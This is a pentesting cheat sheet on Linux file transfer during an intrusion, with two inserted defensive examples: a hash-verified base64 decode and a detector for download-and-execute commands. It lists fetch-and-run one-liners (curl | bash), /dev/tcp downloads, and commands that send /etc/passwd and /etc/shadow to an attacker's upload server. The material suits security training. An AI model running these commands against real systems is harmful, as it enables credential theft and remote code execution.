
Linux File Transfer

This section contains different methods to transfer a file to or from a Linux machine.

Transfer files to target machine

Base64 Encoding / Decoding

# Check File MD5 hash
md5sum id_rsa

# Encode SSH Key to Base64
cat id_rsa |base64 -w 0;echo

# We copy this content, paste it onto our Linux target machine, and use base64 with the option `-d` to decode it.

# Decode the File
echo -n 'LS0t---S0tLQo=' | base64 -d > id_rsa

# Confirm the MD5 Hashes Match
md5sum id_rsa
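
The decode-and-compare steps above can be made to fail closed. The following is an added example, not part of the original notes: the function name `install_verified_b64` and its return codes are assumptions, and it uses `sha256sum` in place of the `md5sum` shown above.

```shell
#!/usr/bin/env bash
# Added example: decode a pasted base64 blob and install it only when its
# SHA-256 digest matches the value recorded on the sending side.
# install_verified_b64 is a hypothetical helper, not a standard tool.

# Usage: install_verified_b64 <base64-text> <expected-sha256> <destination>
# Returns 0 on success, 1 on decode failure, 2 on digest mismatch.
install_verified_b64() {
    local blob expected dest tmp actual
    blob="$1"; expected="$2"; dest="$3"

    # Work in a private temp file so a partial or corrupt decode never
    # lands at the destination path.
    tmp=$(mktemp) || return 1

    # base64 -d exits non-zero when the pasted text is not valid base64.
    if ! printf '%s' "$blob" | base64 -d > "$tmp" 2>/dev/null; then
        rm -f "$tmp"
        return 1
    fi

    actual=$(sha256sum "$tmp" | cut -d' ' -f1)
    if [ "$actual" != "$expected" ]; then
        rm -f "$tmp"
        return 2
    fi

    # Private keys such as id_rsa must not be group/world readable.
    chmod 600 "$tmp"
    mv -f "$tmp" "$dest"
}
```
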

Web Downloads with Wget and cURL

# Download a File Using cURL
curl -o /tmp/LinEnum.sh /rebootuser/LinEnum/master/LinEnum.sh

# Download a File Using wget
wget https://rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh

Fileless Attacks Using Linux

# Fileless Download with cURL
curl https://URL/LinEnum.sh | bash

# Fileless Download with wget
wget -qO- https://URL/helloworld.py | python3

Download with Bash (/dev/tcp)

# Connect to the Target Webserver
exec 3<>/dev/tcp/10.10.10.32/80

# HTTP GET Request
echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3

# Print the Response
cat <&3
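
The pipe-to-interpreter downloads and the `/dev/tcp` redirection shown above leave no file on disk, so monitoring has to key on the command string itself (shell history or `bash -c` arguments captured by process auditing). The following is an added example, not part of the original notes: the `user command` record format, the tag names and the `example.test` hosts are constructed assumptions.

```shell
#!/usr/bin/env bash
# Added example: flag the download-and-execute patterns from this page in
# captured command strings. Record format and tag names are assumptions.

# curl/wget output piped straight into a shell or script interpreter.
PIPE_RE='(^|[^[:alnum:]_])(curl|wget)[[:space:]][^|]*\|[[:space:]]*(sudo[[:space:]]+)?(bash|sh|dash|zsh|python[0-9.]*|perl|ruby|php)([[:space:]]|$)'
# Bash pseudo-device used to open a raw socket without any client binary.
DEVTCP_RE='/dev/(tcp|udp)/[^/[:space:]]+/[0-9]+'

# classify_cmdline <command string> -> prints one tag
classify_cmdline() {
    if printf '%s\n' "$1" | grep -Eq "$PIPE_RE"; then
        echo pipe-to-interpreter
    elif printf '%s\n' "$1" | grep -Eq "$DEVTCP_RE"; then
        echo dev-tcp-socket
    else
        echo none
    fi
}

# scan_log: read "user command..." records on stdin and print the flagged
# ones as "tag user command...".
scan_log() {
    local user cmd tag
    while read -r user cmd; do
        tag=$(classify_cmdline "$cmd")
        [ "$tag" = none ] || printf '%s %s %s\n' "$tag" "$user" "$cmd"
    done
}

# Constructed sample records (not real log data).
sample_log() {
    printf '%s %s\n' \
        alice 'curl -o /tmp/LinEnum.sh https://files.example.test/LinEnum.sh' \
        bob   'curl https://files.example.test/LinEnum.sh | bash' \
        bob   'wget -qO- https://files.example.test/helloworld.py | python3' \
        carol 'exec 3<>/dev/tcp/10.10.10.32/80' \
        dave  'curl -s https://api.example.test/status | jq .'
}

sample_log | scan_log
```
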

SSH Downloads

# Enabling the SSH Server
sudo systemctl enable ssh

# Starting the SSH Server
sudo systemctl start ssh

# Checking for SSH Listening Port
netstat -lnpt

# Downloading Files Using SCP
scp plaintext@192.168.49.128:/root/myroot.txt .

Get files from target host to our attack machine

Web Upload

# Install uploadserver
python3 -m pip install --user uploadserver

# Create a Self-Signed Certificate
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

# Create a new directory to host the files for our web server
mkdir https && cd https

# Start the web server
python3 -m uploadserver 443 --server-certificate /root/server.pem

# Upload Multiple Files - from target host
curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

Alternative Web Server Method

# Creating a Web Server with Python3
python3 -m http.server

# Creating a Web Server with Python2.7
python2.7 -m SimpleHTTPServer

# Creating a Web Server with PHP
php -S 0.0.0.0:8000

# Creating a Web Server with Ruby
ruby -run -ehttpd . -p8000

# Download the File from the Target Machine onto the Pwnbox
wget 192.168.49.128:8000/filetotransfer.txt

SCP Upload

# We may find some companies that allow the SSH protocol (TCP/22) for outbound connections, and if that's the case, we can use an SSH server with the scp utility to upload files. Let's attempt to upload a file using the SSH protocol.
# Run the command and enter the user and password
scp /etc/passwd user@192.168.49.128:/home/user/

Last updated 2 years ago